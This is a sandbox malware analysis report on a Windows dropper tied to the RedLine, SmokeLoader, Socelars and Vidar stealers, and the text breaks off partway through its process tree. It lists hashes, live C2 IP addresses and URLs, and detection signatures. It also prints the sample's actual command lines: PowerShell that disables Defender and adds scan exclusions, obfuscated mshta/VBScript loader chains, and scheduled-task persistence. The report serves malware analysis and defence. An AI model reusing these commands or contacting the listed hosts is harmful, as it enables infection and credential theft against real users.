redline | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

Resubmissions

10/11/2021, 14:50

211110-r7nbvaeddr 10

08/11/2021, 16:12

211108-tnmmbahgaj 10

08/11/2021, 15:26

211108-svdsbaccf6 10

08/11/2021, 14:48

211108-r6lfvshdfn 10

Analysis

max time kernel
35s
max time network
186s
platform
windows10_x64
resource
win10-en-20211104
submitted
10/11/2021, 14:50

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Size

5.9MB
MD5

00987bdf68fafbdfa9dd1365a6827d72
SHA1

f205c391087833eeb978895d37c2e199c4bf2747
SHA256

f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb
SHA512

9fb4e297f48a95d31a3bc82159b7304f29f50d9e7b823a91b6af02453deca7cf5ef50698b1aee9f00120c1d5d90de1b0fdbb5c92fedbc5823eea743d9e3e6319

Score

10^/10

redline smokeloader socelars vidar 937 chris media29 srtupdate33 aspackv2 backdoor evasion infostealer stealer suricata trojan

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

redline

Botnet

media29

91.121.67.60:23325

Extracted

Family

redline

Botnet

chris

194.104.136.5:46013

Extracted

Family

redline

Botnet

srtupdate33

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32

Extracted

Family

vidar

Version

48.1

Botnet

937

Attributes

profile_id
937

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4676	3956	rundll32.exe	133

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 6 IoCs

resource	yara_rule
behavioral30/memory/2088-274-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral30/memory/1312-275-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral30/memory/2088-276-0x0000000000418D2A-mapping.dmp	family_redline
behavioral30/memory/1312-282-0x0000000000418D32-mapping.dmp	family_redline
behavioral30/memory/4016-279-0x0000000000418D3E-mapping.dmp	family_redline
behavioral30/memory/4016-277-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral30/files/0x000400000001abcf-209.dat	family_socelars
behavioral30/files/0x000400000001abcf-175.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral30/memory/5628-599-0x0000000002210000-0x00000000022E5000-memory.dmp	family_vidar
behavioral30/memory/5628-604-0x0000000000400000-0x00000000004D8000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral30/files/0x000600000001abd7-126.dat	aspack_v212_v242
behavioral30/files/0x000600000001abd5-127.dat	aspack_v212_v242
behavioral30/files/0x000600000001abd7-129.dat	aspack_v212_v242
behavioral30/files/0x000600000001abd5-128.dat	aspack_v212_v242
behavioral30/files/0x000200000001abe0-131.dat	aspack_v212_v242
behavioral30/files/0x000200000001abe0-134.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 19 IoCs

pid	Process
1232	setup_installer.exe
1436	setup_install.exe
3372	Fri04e6f3b78ae5759.exe
2976	Fri04f70c88181ec8.exe
1724	Fri048a4e8610c6c199.exe
1668	Fri040eeed7d137.exe
4080	Fri0471ced4d802994.exe
2020	Fri04113f869350dcf8.exe
2032	Fri043b65bf09aa6129a.exe
4040	Fri0470d89df3bb718.exe
2776	Fri04b1200e850ea1bc.exe
3968	Fri042d82e64f594.exe
700	Fri0480a54c0d2a7.exe
1068	Fri040df945a5.exe
1420	Fri047a1b6fc980f8.exe
3160	Fri0431de7a47.exe
3104	Fri0471ced4d802994.tmp
3220	Fri04a13875aa1c59b58.exe
652	Fri043a70f76ef98.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 7 IoCs

pid	Process
1436	setup_install.exe
1436	setup_install.exe
1436	setup_install.exe
1436	setup_install.exe
1436	setup_install.exe
1436	setup_install.exe
3104	Fri0471ced4d802994.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
66	ipinfo.io
196	freegeoip.app
198	freegeoip.app
209	freegeoip.app
232	ipinfo.io
235	ipinfo.io
11	ip-api.com
65	ipinfo.io
67	ipinfo.io
201	freegeoip.app
234	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 14 IoCs

pid	pid_target	Process	procid_target
2028	1436	WerFault.exe	69
4580	1068	WerFault.exe	94
4704	1068	WerFault.exe	94
4996	1068	WerFault.exe	94
3372	1068	WerFault.exe	94
1176	1068	WerFault.exe	94
5200	1068	WerFault.exe	94
5668	1068	WerFault.exe	94
6000	5716	WerFault.exe	159
5244	5716	WerFault.exe	159
5620	5716	WerFault.exe	159
2840	5860	WerFault.exe	164
5192	5716	WerFault.exe	159
5520	1472	WerFault.exe	174

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4440	schtasks.exe
4312	schtasks.exe
3796	schtasks.exe
5096	schtasks.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
4960	taskkill.exe
5044	taskkill.exe
4536	taskkill.exe
2852	taskkill.exe
288	taskkill.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeAssignPrimaryTokenPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeLockMemoryPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeIncreaseQuotaPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeMachineAccountPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeTcbPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeSecurityPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeTakeOwnershipPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeLoadDriverPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeSystemProfilePrivilege	700	Fri0480a54c0d2a7.exe
Token: SeSystemtimePrivilege	700	Fri0480a54c0d2a7.exe
Token: SeProfSingleProcessPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeIncBasePriorityPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeCreatePagefilePrivilege	700	Fri0480a54c0d2a7.exe
Token: SeCreatePermanentPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeBackupPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeRestorePrivilege	700	Fri0480a54c0d2a7.exe
Token: SeShutdownPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeDebugPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeAuditPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeSystemEnvironmentPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeChangeNotifyPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeRemoteShutdownPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeUndockPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeSyncAgentPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeEnableDelegationPrivilege	700	Fri0480a54c0d2a7.exe
Token: SeManageVolumePrivilege	700	Fri0480a54c0d2a7.exe
Token: SeImpersonatePrivilege	700	Fri0480a54c0d2a7.exe
Token: SeCreateGlobalPrivilege	700	Fri0480a54c0d2a7.exe
Token: 31	700	Fri0480a54c0d2a7.exe
Token: 32	700	Fri0480a54c0d2a7.exe
Token: 33	700	Fri0480a54c0d2a7.exe
Token: 34	700	Fri0480a54c0d2a7.exe
Token: 35	700	Fri0480a54c0d2a7.exe
Token: SeDebugPrivilege	4040	Fri0470d89df3bb718.exe
Token: SeRestorePrivilege	2028	WerFault.exe
Token: SeBackupPrivilege	2028	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2584 wrote to memory of 1232	2584	f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe	68
PID 2584 wrote to memory of 1232	2584	f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe	68
PID 2584 wrote to memory of 1232	2584	f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe	68
PID 1232 wrote to memory of 1436	1232	setup_installer.exe	69
PID 1232 wrote to memory of 1436	1232	setup_installer.exe	69
PID 1232 wrote to memory of 1436	1232	setup_installer.exe	69
PID 1436 wrote to memory of 1160	1436	setup_install.exe	72
PID 1436 wrote to memory of 1160	1436	setup_install.exe	72
PID 1436 wrote to memory of 1160	1436	setup_install.exe	72
PID 1436 wrote to memory of 1364	1436	setup_install.exe	73
PID 1436 wrote to memory of 1364	1436	setup_install.exe	73
PID 1436 wrote to memory of 1364	1436	setup_install.exe	73
PID 1160 wrote to memory of 1360	1160	cmd.exe	75
PID 1160 wrote to memory of 1360	1160	cmd.exe	75
PID 1160 wrote to memory of 1360	1160	cmd.exe	75
PID 1364 wrote to memory of 4092	1364	cmd.exe	74
PID 1364 wrote to memory of 4092	1364	cmd.exe	74
PID 1364 wrote to memory of 4092	1364	cmd.exe	74
PID 1436 wrote to memory of 596	1436	setup_install.exe	76
PID 1436 wrote to memory of 596	1436	setup_install.exe	76
PID 1436 wrote to memory of 596	1436	setup_install.exe	76
PID 1436 wrote to memory of 392	1436	setup_install.exe	77
PID 1436 wrote to memory of 392	1436	setup_install.exe	77
PID 1436 wrote to memory of 392	1436	setup_install.exe	77
PID 1436 wrote to memory of 352	1436	setup_install.exe	78
PID 1436 wrote to memory of 352	1436	setup_install.exe	78
PID 1436 wrote to memory of 352	1436	setup_install.exe	78
PID 1436 wrote to memory of 1756	1436	setup_install.exe	79
PID 1436 wrote to memory of 1756	1436	setup_install.exe	79
PID 1436 wrote to memory of 1756	1436	setup_install.exe	79
PID 1436 wrote to memory of 4024	1436	setup_install.exe	83
PID 1436 wrote to memory of 4024	1436	setup_install.exe	83
PID 1436 wrote to memory of 4024	1436	setup_install.exe	83
PID 1436 wrote to memory of 3380	1436	setup_install.exe	80
PID 1436 wrote to memory of 3380	1436	setup_install.exe	80
PID 1436 wrote to memory of 3380	1436	setup_install.exe	80
PID 1436 wrote to memory of 732	1436	setup_install.exe	81
PID 1436 wrote to memory of 732	1436	setup_install.exe	81
PID 1436 wrote to memory of 732	1436	setup_install.exe	81
PID 1436 wrote to memory of 3292	1436	setup_install.exe	82
PID 1436 wrote to memory of 3292	1436	setup_install.exe	82
PID 1436 wrote to memory of 3292	1436	setup_install.exe	82
PID 1436 wrote to memory of 932	1436	setup_install.exe	85
PID 1436 wrote to memory of 932	1436	setup_install.exe	85
PID 1436 wrote to memory of 932	1436	setup_install.exe	85
PID 1436 wrote to memory of 876	1436	setup_install.exe	84
PID 1436 wrote to memory of 876	1436	setup_install.exe	84
PID 1436 wrote to memory of 876	1436	setup_install.exe	84
PID 1436 wrote to memory of 764	1436	setup_install.exe	87
PID 1436 wrote to memory of 764	1436	setup_install.exe	87
PID 1436 wrote to memory of 764	1436	setup_install.exe	87
PID 1756 wrote to memory of 3372	1756	cmd.exe	86
PID 1756 wrote to memory of 3372	1756	cmd.exe	86
PID 1756 wrote to memory of 3372	1756	cmd.exe	86
PID 1436 wrote to memory of 2892	1436	setup_install.exe	110
PID 1436 wrote to memory of 2892	1436	setup_install.exe	110
PID 1436 wrote to memory of 2892	1436	setup_install.exe	110
PID 1436 wrote to memory of 1220	1436	setup_install.exe	89
PID 1436 wrote to memory of 1220	1436	setup_install.exe	89
PID 1436 wrote to memory of 1220	1436	setup_install.exe	89
PID 3380 wrote to memory of 2976	3380	cmd.exe	88
PID 3380 wrote to memory of 2976	3380	cmd.exe	88
PID 3380 wrote to memory of 2976	3380	cmd.exe	88
PID 1436 wrote to memory of 1600	1436	setup_install.exe	109

C:\Users\Admin\AppData\Local\Temp\f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
"C:\Users\Admin\AppData\Local\Temp\f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2584
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1232
- - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1436
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1160
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        
        PID:1360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1364
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:4092
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri048a4e8610c6c199.exe
      4⤵
      PID:596
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri048a4e8610c6c199.exe
        
        Fri048a4e8610c6c199.exe
        5⤵
        Executes dropped EXE
        
        PID:1724
      - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri048a4e8610c6c199.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri048a4e8610c6c199.exe" -u
        6⤵
        
        PID:3792
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri04113f869350dcf8.exe
      4⤵
      PID:392
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04113f869350dcf8.exe
        
        Fri04113f869350dcf8.exe
        5⤵
        Executes dropped EXE
        
        PID:2020
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04113f869350dcf8.exe"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF """" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04113f869350dcf8.exe"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )
        6⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04113f869350dcf8.exe" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "" == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04113f869350dcf8.exe" ) do taskkill /Im "%~Nxs" -f
        7⤵
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE
        
        ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k
        8⤵
        
        PID:4904
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF ""-pVmK5OY1Q2FwiV3_NJROp~tX8k "" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )
        9⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "-pVmK5OY1Q2FwiV3_NJROp~tX8k " == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ) do taskkill /Im "%~Nxs" -f
        10⤵
        
        PID:4160
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBsCrIpt: closE ( crEateOBjECT ("WsCRipT.sHELl" ).ruN( "cmD.Exe /r EchO | SEt /P = ""MZ"" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB + V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q * " ,0 , TRUE ) )
        9⤵
        
        PID:5776
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r EchO | SEt /P = "MZ" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB+ V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q *
        10⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EchO "
        11⤵
        
        PID:1908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>OoZ39QP7.Q~P"
        11⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe -y ..\WgKZNZ9T.JOX
        11⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /Im "Fri04113f869350dcf8.exe" -f
        8⤵
        Kills process with taskkill
        
        PID:4960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri040eeed7d137.exe
      4⤵
      PID:352
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri040eeed7d137.exe
        
        Fri040eeed7d137.exe
        5⤵
        Executes dropped EXE
        
        PID:1668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri04e6f3b78ae5759.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1756
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04e6f3b78ae5759.exe
        
        Fri04e6f3b78ae5759.exe
        5⤵
        Executes dropped EXE
        
        PID:3372
      - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04e6f3b78ae5759.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04e6f3b78ae5759.exe
        6⤵
        
        PID:1312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri04f70c88181ec8.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3380
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04f70c88181ec8.exe
        
        Fri04f70c88181ec8.exe
        5⤵
        Executes dropped EXE
        
        PID:2976
      - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04f70c88181ec8.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04f70c88181ec8.exe
        6⤵
        
        PID:2088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri043b65bf09aa6129a.exe
      4⤵
      PID:732
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri043b65bf09aa6129a.exe
        
        Fri043b65bf09aa6129a.exe
        5⤵
        Executes dropped EXE
        
        PID:2032
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCrIPT:cLOsE(CREatEObjecT( "wscript.shell" ). ruN ("cMD.eXe /q/c coPY /y ""C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri043b65bf09aa6129a.exe"" ..\FJX5FJQXmPBM.exE && STart ..\FJX5FjQXmPBM.eXE -POMRtdzPDR3vhvdcwHXlRw6vXu6 & If """" == """" for %m iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri043b65bf09aa6129a.exe"" ) do taskkill /F /iM ""%~nXm"" " , 0, tRUE ) )
        6⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q/c coPY /y "C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri043b65bf09aa6129a.exe" ..\FJX5FJQXmPBM.exE && STart ..\FJX5FjQXmPBM.eXE -POMRtdzPDR3vhvdcwHXlRw6vXu6 & If ""== "" for %m iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri043b65bf09aa6129a.exe") do taskkill /F /iM "%~nXm"
        7⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\FJX5FJQXmPBM.exE
        
        ..\FJX5FjQXmPBM.eXE -POMRtdzPDR3vhvdcwHXlRw6vXu6
        8⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCrIPT:cLOsE(CREatEObjecT( "wscript.shell" ). ruN ("cMD.eXe /q/c coPY /y ""C:\Users\Admin\AppData\Local\Temp\FJX5FJQXmPBM.exE"" ..\FJX5FJQXmPBM.exE && STart ..\FJX5FjQXmPBM.eXE -POMRtdzPDR3vhvdcwHXlRw6vXu6 & If ""-POMRtdzPDR3vhvdcwHXlRw6vXu6 "" == """" for %m iN ( ""C:\Users\Admin\AppData\Local\Temp\FJX5FJQXmPBM.exE"" ) do taskkill /F /iM ""%~nXm"" " , 0, tRUE ) )
        9⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q/c coPY /y "C:\Users\Admin\AppData\Local\Temp\FJX5FJQXmPBM.exE" ..\FJX5FJQXmPBM.exE && STart ..\FJX5FjQXmPBM.eXE -POMRtdzPDR3vhvdcwHXlRw6vXu6 & If "-POMRtdzPDR3vhvdcwHXlRw6vXu6 "== "" for %m iN ( "C:\Users\Admin\AppData\Local\Temp\FJX5FJQXmPBM.exE") do taskkill /F /iM "%~nXm"
        10⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRipt: CLOSE ( CreateobjeCT( "WScRipT.shELL" ). RUn ( "cmd /r EcHO | set /P = ""MZ"" > LBBCBWE.COE & Copy /Y /b LBbCBWe.COE + PdpGW72.5yO +mNJeI.lLp + GL6hqC.zFb ..\JPBHeH05.Q & StART msiexec -y ..\JPBHeH05.Q & DeL /q * " , 0, TRue ))
        9⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r EcHO | set /P = "MZ" > LBBCBWE.COE & Copy /Y /b LBbCBWe.COE + PdpGW72.5yO+mNJeI.lLp +GL6hqC.zFb ..\JPBHeH05.Q &StART msiexec -y ..\JPBHeH05.Q& DeL /q *
        10⤵
        
        PID:5964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHO "
        11⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>LBBCBWE.COE"
        11⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -y ..\JPBHeH05.Q
        11⤵
        
        PID:704
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /iM "Fri043b65bf09aa6129a.exe"
        8⤵
        Kills process with taskkill
        
        PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri04b1200e850ea1bc.exe
      4⤵
      PID:3292
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04b1200e850ea1bc.exe
        
        Fri04b1200e850ea1bc.exe
        5⤵
        Executes dropped EXE
        
        PID:2776
      - C:\Users\Admin\Pictures\Adobe Films\cBWlpDeb8KNkxWSpE9onw3YZ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\cBWlpDeb8KNkxWSpE9onw3YZ.exe"
        6⤵
        
        PID:5000
      - C:\Users\Admin\Pictures\Adobe Films\CJhmZcUXzcicuC__JLoqfcJ8.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\CJhmZcUXzcicuC__JLoqfcJ8.exe"
        6⤵
        
        PID:5564
      - C:\Users\Admin\Pictures\Adobe Films\1W1a_lh3Yc8JfZ2YPPg23wJB.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\1W1a_lh3Yc8JfZ2YPPg23wJB.exe"
        6⤵
        
        PID:5452
        
        C:\Users\Admin\Documents\lSp21qSC06YoyM9GfYOEHybu.exe
        
        "C:\Users\Admin\Documents\lSp21qSC06YoyM9GfYOEHybu.exe"
        7⤵
        
        PID:5548
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4440
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4312
      - C:\Users\Admin\Pictures\Adobe Films\z13GhI2H7XL1uXZj08ZtUZPa.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\z13GhI2H7XL1uXZj08ZtUZPa.exe"
        6⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 656
        7⤵
        Program crash
        
        PID:6000
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 672
        7⤵
        Program crash
        
        PID:5244
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 628
        7⤵
        Program crash
        
        PID:5620
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 656
        7⤵
        Program crash
        
        PID:5192
      - C:\Users\Admin\Pictures\Adobe Films\JtTRAPEj3BAWzuYvttlULwXi.exe
        
